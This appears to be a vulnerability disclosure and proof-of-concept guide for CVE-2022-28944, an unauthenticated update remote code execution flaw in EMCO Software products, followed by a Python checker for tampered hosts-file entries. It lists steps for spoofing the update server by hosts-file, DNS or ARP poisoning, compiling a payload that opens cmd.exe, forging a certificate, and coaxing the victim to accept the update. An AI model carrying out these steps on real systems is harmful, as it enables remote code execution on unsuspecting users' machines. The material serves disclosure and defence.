EMCO Software Multiple Products Unauthenticated Update Remote Code Execution Vulnerability.
Usage: python3 cve-2022-28944_poc.py
Details in the report at gerr.re.
- Install an affected product of EMCO Software;
- Spoof `storage.emcosoftware.com` so that it resolves to our attacker IP;
  - For a proof-of-concept, edit `c:\windows\system32\drivers\etc\hosts` on the target.
  - Note: attackers may e.g. use:
    - poorly configured routers/switches/DNS,
    - DNS spoof / cache poisoning,
    - ARP spoof / cache poisoning.
- Compile `proof.c` on the attacker, e.g. using `i686-w64-mingw32-gcc proof.c -o proof.exe`;

  ```c
  #include <windows.h>

  int main(int argc, char const *argv[]){
      /* Opens a visible command prompt as proof of code execution. */
      WinExec("cmd.exe",1);
      return TRUE;
  }
  ```
- Generate self-signed certificates;
  - e.g. using `openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"`
- Run the proof-of-concept script;
- Start the affected product of EMCO Software and either
  - wait a day to trigger update automatically, or
  - trigger the update manually through the application menu;
- Accept the update in the Update Wizard.
  - Attackers will use a persuasive update description to convince a target to accept the update.
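
A defender-side check for the hosts-file step above, added here as an example and not part of the original proof-of-concept: it scans hosts-file text for entries that pin `storage.emcosoftware.com` to a fixed address. The function name `find_overrides` and the sample file contents are constructed for illustration.

```python
import ipaddress

# Update host named in the steps above.
UPDATE_HOST = "storage.emcosoftware.com"

# Constructed sample hosts file (not taken from a real system).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.0.2.10      intranet.example  # storage.emcosoftware.com in a comment only
198.51.100.23   files.example Storage.EMCOsoftware.com.   # override
not-an-ip       storage.emcosoftware.com
"""


def _norm(name):
    """Lower-case a hostname and drop a trailing root dot."""
    return name.lower().rstrip(".")


def find_overrides(hosts_text, watched=(UPDATE_HOST,)):
    """Return (line_no, address, hostname) for each entry that pins a watched name."""
    watched = {_norm(w) for w in watched}
    hits = []
    for line_no, raw in enumerate(hosts_text.splitlines(), start=1):
        # Drop comments, then split into the address and its hostnames.
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            # Strip an IPv6 zone id ("%eth0") before validating the address.
            addr = ipaddress.ip_address(fields[0].split("%", 1)[0])
        except ValueError:
            continue  # first field is not an IP address, so not a mapping
        for name in fields[1:]:
            if _norm(name) in watched:
                hits.append((line_no, str(addr), _norm(name)))
    return hits


if __name__ == "__main__":
    # On a real host, pass the contents of the system hosts file instead.
    for line_no, addr, name in find_overrides(SAMPLE_HOSTS):
        print(f"hosts line {line_no}: {name} pinned to {addr}")
```

This catches only the hosts-file variant; DNS or ARP spoofing leaves the hosts file untouched.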